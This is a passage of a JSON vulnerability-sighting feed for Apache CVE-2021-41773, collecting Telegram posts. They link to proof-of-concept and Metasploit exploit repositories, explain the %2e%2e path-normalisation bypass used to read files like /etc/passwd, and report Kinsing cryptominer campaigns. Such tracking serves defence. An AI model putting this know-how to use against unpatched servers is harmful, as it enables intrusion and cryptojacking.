"04ebc763-a5b4-44f9-82c4-675c0c1626da", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/47346", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aBash POC script for RCE vulnerability in Apache 2.4.49\nURL\uff1ahttps://github.com/mah4nzfr/CVE-2021-41773\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-08-11T13:01:35.000000Z"}, {"uuid": "a78ebc10-bb2d-4d32-9b9a-b670372d5924", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18186", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aAutomatic thesauri backups from RCE PoolParty\nURL\uff1ahttps://github.com/Vanshuk-Bhagat/Apache-HTTP-Server-Vulnerabilities---CVE-2021-41773-and-CVE-2021-42013\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-11T07:58:21.000000Z"}, {"uuid": "ff9871f1-3eab-4985-802e-e5ee0aa0169f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/666", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2021\n\u63cf\u8ff0\uff1aA framework for bug hunting or pentesting targeting websites that have CVE-2021-41773 Vulnerability in public \nURL\uff1ahttps://github.com/HightechSec/scarce-apache2", "creation_timestamp": "2021-10-07T02:33:57.000000Z"}, {"uuid": "039dc061-7a71-4644-9355-492d86d0aec2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/toolslounge/631", "content": "apache srever exploit \nCVE-2021-41773\nhttps://github.com/rapid7/metasploit-framework/pull/15754", "creation_timestamp": "2021-10-08T06:46:03.000000Z"}, {"uuid": "977e73d7-5eab-48d2-9dbd-5c311bff7c1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/18189", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01 \n\n\u66f4\u65b0\u4e86\uff1aRCE\n\u63cf\u8ff0\uff1aAutomatic thesauri backups from RCE PoolParty\nURL\uff1ahttps://github.com/Vanshuk-Bhagat/Apache-HTTP-Server-Vulnerabilities-CVE-2021-41773-and-CVE-2021-42013\n\n\u6807\u7b7e\uff1a#RCE", "creation_timestamp": "2025-03-11T08:02:50.000000Z"}, {"uuid": "d9976f2d-843f-43de-a06c-c073c2a6262d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/tech_b0lt_Genona/2829", "content": "CVE-2021-41773: Apache 2.4.49 Path Traversal\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u0439\u0442\u0438 \u0437\u0430 \u043f\u0440\u0435\u0434\u0435\u043b\u044b \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u0438 \u0432\u0435\u0431\u0441\u0430\u0439\u0442\u0430 \u0438 \u0431\u0435\u0437 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0441\u0447\u0438\u0442\u0430\u0442\u044c, \u043d\u0443 \u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, /etc/passwd\n\n\u041a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u0440\u0438\u0432\u0435\u043b \u043e\u0431\u044b\u0447\u043d\u044b\u0439 \u0440\u0435\u0444\u0430\u043a\u0442\u043e\u0440\u0438\u043d\u0433 - \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0438 \u0432 \u0432\u0435\u0440\u0441\u0438\u0438 2.4.49 \u0440\u0435\u0448\u0438\u043b\u0438 \u0443\u043d\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u043f\u0440\u043e\u0441\u0442\u044b\u043d\u044e \u0441 \u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0435\u0439 \u043f\u0443\u0442\u0438, \u0438 \u0432\u044b\u043d\u0435\u0441\u043b\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0443 \u0432 \u043e\u0442\u0434\u0435\u043b\u044c\u043d\u0443\u044e \u0444\u0443\u043d\u043a\u0446\u0438\u044e ap_normalize_path. \n\n\u0412 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u0441 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u043e\u0439 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u0441\u0438\u043c\u0432\u043e\u043b\u0430 '.' \u0432 \u043f\u0443\u0442\u0438 \u0438 \u0437\u0430\u043a\u0440\u0430\u043b\u0441\u044f \u0431\u0430\u0433 \u0432 571 \u0441\u0442\u0440\u043e\u043a\u0435 - \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0438\u0441\u0442 \u043d\u0435 \u0443\u0447\u0435\u043b, \u0447\u0442\u043e \u0432 \u043a\u043e\u043d\u0442\u0435\u043a\u0441\u0442\u0435 \u0435\u0449\u0435 \u043d\u0435 \u043f\u0440\u043e\u0438\u0437\u043e\u0448\u0435\u043b url decode. \n\n\u0412 \u0438\u0442\u043e\u0433\u0435 \u0432\u043e\u0437\u043d\u0438\u043a\u043b\u0430 \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u044f, \u043a\u043e\u0433\u0434\u0430 \u0432\u0441\u0435 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u043d\u0430 \u043e\u0431\u0445\u043e\u0434 \u043a\u0430\u0442\u0430\u043b\u043e\u0433\u0430 \u0447\u0435\u0440\u0435\u0437 %2e%2e \u043f\u043e\u043f\u0430\u043b\u0438 \u0432 \u0443\u0441\u043b\u043e\u0432\u0438\u0435, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043d\u0435 \u043e\u0431\u0440\u0430\u0431\u0430\u0442\u044b\u0432\u0430\u043b\u043e\u0441\u044c, \u0438 \u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u0430\u044f \u0444\u0443\u043d\u043a\u0446\u0438\u044f \u043f\u043e \u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0443\u0442\u0438 ap_normalize_path, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0438 \u0434\u043e\u043b\u0436\u043d\u0430 \u0441\u0440\u0435\u0437\u0430\u0442\u044c \u0441\u0438\u0442\u0443\u0430\u0446\u0438\u0438 \u0432\u0440\u043e\u0434\u0435 ../, \u0441\u0442\u0430\u043b\u0430 \u0432\u043e\u0437\u0432\u0440\u0430\u0449\u0430\u0442\u044c \u043d\u0435\u043d\u043e\u0440\u043c\u0430\u043b\u0438\u0437\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u0443\u0442\u044c.", "creation_timestamp": "2021-10-05T21:21:39.000000Z"}, {"uuid": "9f798f37-39be-4a1f-a522-810902be8a32", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/WJizVeVzTrNn9rQzefZR4NZwKXLe6pIHJJmdQfVN3UctWtw", "content": "", "creation_timestamp": "2025-09-14T21:00:05.000000Z"}, {"uuid": "53a47f74-f97a-4b17-af0d-bd6178602b60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/hackyourmom/12083", "content": "\ud83d\udcbb \u041d\u043e\u0432\u0430 \u0445\u0432\u0438\u043b\u044f \u0430\u0442\u0430\u043a \u0431\u02bc\u0454 \u043e\u0434\u043d\u043e\u0447\u0430\u0441\u043d\u043e \u043f\u043e Apache \u0456 Microsoft Exchange \u0445\u0430\u043a\u0435\u0440\u0438 \u0432\u0438\u043a\u043e\u0440\u0438\u0441\u0442\u043e\u0432\u0443\u044e\u0442\u044c CVE-2021-41773 \u0449\u043e\u0431 \u0434\u043e\u0441\u0442\u0430\u0432\u0438\u0442\u0438 \u043c\u0430\u0439\u043d\u0435\u0440 Linuxsys \u0447\u0435\u0440\u0435\u0437 \u043b\u0435\u0433\u0456\u0442\u0438\u043c\u043d\u0456 \u0441\u0430\u0439\u0442\u0438 \u0437 SSL-\u0437\u0430\u0445\u0438\u0441\u0442\u043e\u043c \u043f\u043e\u0442\u0456\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442\u044c \u0441\u043a\u0440\u0438\u043f\u0442\u0438 \u044f\u043a\u0456 \u0432\u0438\u043c\u0438\u043a\u0430\u044e\u0442\u044c \u0430\u043d\u0442\u0438\u0432\u0456\u0440\u0443\u0441\u0438 \u0441\u0435\u0440\u0432\u0456\u0441\u0438 \u0439 \u0437\u0430\u043a\u0438\u0434\u0430\u044e\u0442\u044c XMRig \u0442\u0430 Kinsing  \ud83d\udc7e \u0411\u0456\u043b\u044c\u0448\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u0438\u0446\u044c \ud83d\udc48 #cybernews", "creation_timestamp": "2025-07-18T12:16:02.000000Z"}, {"uuid": "96663e3d-ee10-4291-a12e-22e3af8f7cc7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/yHnfFcJmN27W7yNIp17KFc8vMEeaxm03MHjNIxWNerQLDCY", "content": "", "creation_timestamp": "2025-09-06T03:00:05.000000Z"}, {"uuid": "9c55eb97-eb38-4193-be2e-e3d0928b2dbf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/true_secator/7335", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 F6 \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u043e \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u043e\u043c \u043d\u0430\u0441\u0442\u0443\u043f\u043b\u0435\u043d\u0438\u0438 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u044b Kinsing (H2Miner \u0438\u00a0Resourceful Wolf) \u043d\u0430 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.\n\n\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0437\u0430 \u0440\u0443\u0431\u0435\u0436\u043e\u043c \u0441 2019 \u0433\u043e\u0434\u0430, \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0441\u0432\u043e\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043e\u0442\u00a0\u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f Kinsing, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043e\u043d\u0430 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0432\u00a0\u0441\u0432\u043e\u0438\u0445 \u0430\u0442\u0430\u043a\u0430\u0445.\n\n\u041e\u043d\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u043d\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0434\u0436\u0435\u043a\u0438\u043d\u0433\u0435 - \u0437\u043b\u043e\u0443\u043f\u043e\u0442\u0440\u0435\u0431\u043b\u0435\u043d\u0438\u0438 \u0432\u044b\u0447\u0438\u0441\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c\u0438 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c \u0434\u043b\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0430 \u043a\u0440\u0438\u043f\u0442\u044b, \u043f\u0440\u0435\u0438\u043c\u0443\u0449\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e Monero (XMR), \u0430 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0438 \u0438 \u043f\u0440\u043e\u0434\u0432\u0438\u0436\u0435\u043d\u0438\u0438 \u0431\u043e\u0442\u043d\u0435\u0442\u043e\u0432.\n\n\u0411\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u043e \u0430\u0442\u0430\u043a \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043d\u044b \u0432 \u0421\u0435\u0432\u0435\u0440\u043d\u043e\u0439 \u0410\u043c\u0435\u0440\u0438\u043a\u0435, \u0417\u0430\u043f\u0430\u0434\u043d\u043e\u0439 \u0415\u0432\u0440\u043e\u043f\u0435 \u0438 \u0410\u0437\u0438\u0438. \n\n\u0412 2024 \u0433\u043e\u0434\u0443 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441\u043e\u043e\u0431\u0449\u0430\u043b\u0438 \u043e\u0431 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 \u0430\u0442\u0430\u043a Kinsing, \u043d\u0435 \u043e\u0431\u043e\u0437\u043d\u0430\u0447\u0430\u044f \u0446\u0435\u043b\u044c \u0430\u0442\u0430\u043a\u0438 \u0438 \u0440\u0430\u0441\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0430 \u0432 2025 \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u043c\u0430\u0441\u0448\u0442\u0430\u0431\u043d\u043e \u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c \u043f\u043e RU.\n\n\u0412\u0435\u0441\u043d\u043e\u0439 \u043e\u0434\u0438\u043d \u0438\u0437 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 F6 \u0437\u0430\u0444\u0438\u043a\u0441\u0438\u0440\u043e\u0432\u0430\u043b \u043f\u043e\u043f\u044b\u0442\u043a\u0443 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0441\u0432\u043e\u0438 \u0432\u043d\u0435\u0448\u043d\u0438\u0435 \u0441\u0435\u0440\u0432\u0435\u0440\u0430.\n\n\u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u0442\u0449\u0430\u0442\u0435\u043b\u044c\u043d\u043e\u0433\u043e \u0430\u043d\u0430\u043b\u0438\u0437\u0430 IoCs, \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u0442\u0440\u0430\u0444\u0438\u043a\u0430 \u0438 \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432\u044b\u044f\u0432\u043b\u044f\u0435\u043c\u044b\u0445 TTPs \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u0432\u044b\u0448\u043b\u0438 \u043d\u0430 \u0441\u043b\u0435\u0434 Kinsing.\n\n\u0413\u043b\u0430\u0432\u043d\u0430\u044f \u0446\u0435\u043b\u044c Kinsing - \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c \u041f\u041e \u0434\u043b\u044f \u043c\u0430\u0439\u043d\u0438\u043d\u0433\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0432\u0430\u043b\u044e\u0442.\n\n\u0412 \u043e\u0442\u043b\u0438\u0447\u0438\u0435 \u043e\u0442\u00a0\u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0430 \u0434\u0440\u0443\u0433\u0438\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043e\u043a,\u00a0Kinsing\u00a0\u043d\u0435 \u043f\u0440\u0438\u0431\u0435\u0433\u0430\u0435\u0442 \u043a\u00a0\u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c \u0430\u0442\u0430\u043a\u0430\u043c, \u0441\u043a\u0430\u043d\u0438\u0440\u0443\u044e\u0442 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443, \u0432\u044b\u044f\u0432\u043b\u044f\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0437\u0430\u0442\u0435\u043c \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0442 \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0447\u0430\u0441\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438: CVE-2017-9841, CVE-2019-17564, CVE-2019-19781, CVE-2020-10684, CVE-2020-17519, CVE-2020-5902, CVE-2020-9480, CVE-2021-26084, CVE-2021-41773, CVE-2021-44228, CVE-2022-24706, CVE-2022-26134, CVE-2023-35042.\n\n\u0412 \u0441\u043b\u0443\u0447\u0430\u0435 \u0443\u0441\u043f\u0435\u0448\u043d\u043e\u0439 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432\u043e \u0436\u0435\u0440\u0442\u0432\u044b \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442\u0441\u044f \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0438\u0449\u0435\u0442 \u043c\u0430\u0439\u043d\u0435\u0440\u044b \u043a\u043e\u043d\u043a\u0443\u0440\u0435\u043d\u0442\u043e\u0432, \u0443\u0434\u0430\u043b\u044f\u0435\u0442 \u0438\u0445 \u0438 \u0443\u0441\u0442\u0430\u043d\u0430\u0432\u043b\u0438\u0432\u0430\u0435\u0442 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439.\n\n\u0410\u0442\u0430\u043a\u0438 Kinsing \u043d\u0430\u0446\u0435\u043b\u0435\u043d\u044b \u043d\u0430\u00a0\u0441\u0435\u0440\u0432\u0435\u0440\u043d\u044b\u0435 Linux-\u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0432\u00a0\u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0438\u00a0\u043a\u043e\u043d\u0442\u0435\u0439\u043d\u0435\u0440\u043d\u044b\u0445 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430\u0445\n\n\u0413\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438\u00a0\u043e\u0448\u0438\u0431\u043a\u0438 \u0432\u00a0\u043d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0435 \u0432\u00a0\u0442\u0430\u043a\u0438\u0445 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0430\u0445, \u043a\u0430\u043a Docker, Kubernetes, Redis \u0438\u00a0PostgreSQL, \u0430\u00a0\u0442\u0430\u043a\u0436\u0435 \u0432\u00a0\u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u0445 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u0430\u0445 - Apache Log4j, Tomcat, NiFi, Confluence, Citrix, WebLogic \u0438\u00a0\u0434\u0440\u0443\u0433\u0438\u0445.\n\n\u0414\u043b\u044f \u043a\u0430\u0436\u0434\u043e\u0439 \u0446\u0435\u043b\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u043a\u0440\u0438\u043f\u0442\u044b (\u043d\u0430\u043f\u0440\u0438\u043c\u0435\u0440,\u00a0lh.sh\u00a0\u0434\u043b\u044f\u00a0Log4Shell), \u0430\u0432\u0442\u043e\u043c\u0430\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0440\u0430\u0437\u0432\u043e\u0440\u0430\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u041f\u041e, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u043c\u0430\u0439\u043d\u0435\u0440\u044b \u0438\u00a0\u0441\u0430\u043c \u0431\u0438\u043d\u0430\u0440\u043d\u0438\u043a Kinsing.\n\n\u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f - \u0437\u0430\u043c\u0435\u0434\u043b\u0435\u043d\u0438\u0435 \u0440\u0430\u0431\u043e\u0442\u044b, \u0441\u043d\u0438\u0436\u0435\u043d\u0438\u0435 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0438 \u0443\u0441\u043a\u043e\u0440\u0435\u043d\u043d\u044b\u0439 \u0438\u0437\u043d\u043e\u0441 \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u044f.\n\n\u0422\u0435\u0445\u043d\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f (\u043e\u0442\u00a0\u0438\u0441\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0438\u00a0\u043f\u0440\u0438\u043c\u0435\u043d\u0451\u043d\u043d\u044b\u0445 \u043c\u0435\u0442\u043e\u0434\u043e\u0432 \u0430\u043d\u0430\u043b\u0438\u0437\u0430 \u0434\u043e \u0438\u0442\u043e\u0433\u043e\u0432\u043e\u0439 \u0430\u0442\u0440\u0438\u0431\u0443\u0446\u0438\u0438 \u0430\u0442\u0430\u043a\u0438 \u0438\u00a0\u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0439) \u0438 IOCs - \u0432 \u043e\u0442\u0447\u0435\u0442\u0435.", "creation_timestamp": "2025-08-15T16:40:05.000000Z"}, {"uuid": "0092a614-7e00-446d-bf40-96312e5d1251", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/GZAW9SXP-WxLbavO6fpxPN5-yoYPWAScFI3HyResH1fq2DU", "content": "", "creation_timestamp": "2025-08-11T21:00:59.000000Z"}, {"uuid": "4628f6f2-bde5-423c-9850-7ede1e61a160", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "Telegram/ns4AhRu3Dgvy_3RdCSiQNSyLk4Tnbw24uzV7lxSYmTv6iA", "content": "", "creation_timestamp": "2025-07-17T15:03:37.000000Z"}, {"uuid": "a32f136d-c03e-4730-8ac3-054d7519f176", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/ptswarm/79", "content": "We have reproduced the fresh CVE-2021-41773 Path Traversal vulnerability in Apache 2.4.49.\n\nIf files outside of the document root are not protected by \"require all denied\" these requests can succeed.\n\nPatch ASAP!\n\nhttps://httpd.apache.org/security/vulnerabilities_24.html", "creation_timestamp": "2021-10-05T15:14:23.000000Z"}, {"uuid": "015ced08-a570-491d-a476-17c9c6799ff3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "exploited", "source": "https://t.me/thehackernews/7176", "content": "\ud83d\udea8 Hackers are hiding crypto miners in legit websites using an old Apache flaw (CVE-2021-41773).\n\nThey\u2019re mining silently. Detection is hard. Victims see HTTPS + valid SSL.\n\nIt\u2019s a stealthy, years-long campaign.\n\nHere\u2019s how it works \u2014 and why it matters:  https://thehackernews.com/2025/07/hackers-exploit-apache-http-server-flaw.html", "creation_timestamp": "2025-07-17T14:23:29.000000Z"}, {"uuid": "d80a6ec9-3b88-47a2-9cbc-6d007fb0e2e1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/89ftCfVT4ANXOHkYPkg4f1crlBnUuWLjMtwENkNHyTME0zA", "content": "", "creation_timestamp": "2025-07-01T15:00:05.000000Z"}, {"uuid": "617cde9c-a02f-4f26-bae4-101222641e1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "published-proof-of-concept", "source": "Telegram/-rzZsG5EjPRwBqHwvxMMz7d452G2kJrxsFvsAodc6TOJ-g", "content": "", "creation_timestamp": "2021-10-13T05:47:28.000000Z"}, {"uuid": "0a3b74a4-8bdd-46a1-895b-4c9aebf4151b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2021-41773", "type": "seen", "source": "https://t.me/arpsyndicate/1348", "content": "#ExploitObserverAlert\n\nCVE-2021-42013\n\nDESCRIPTION: Exploit Observer has 168 entries related to CVE-2021-42013. It was found that the fix for CVE-2021-41773 in Apache HTTP Server 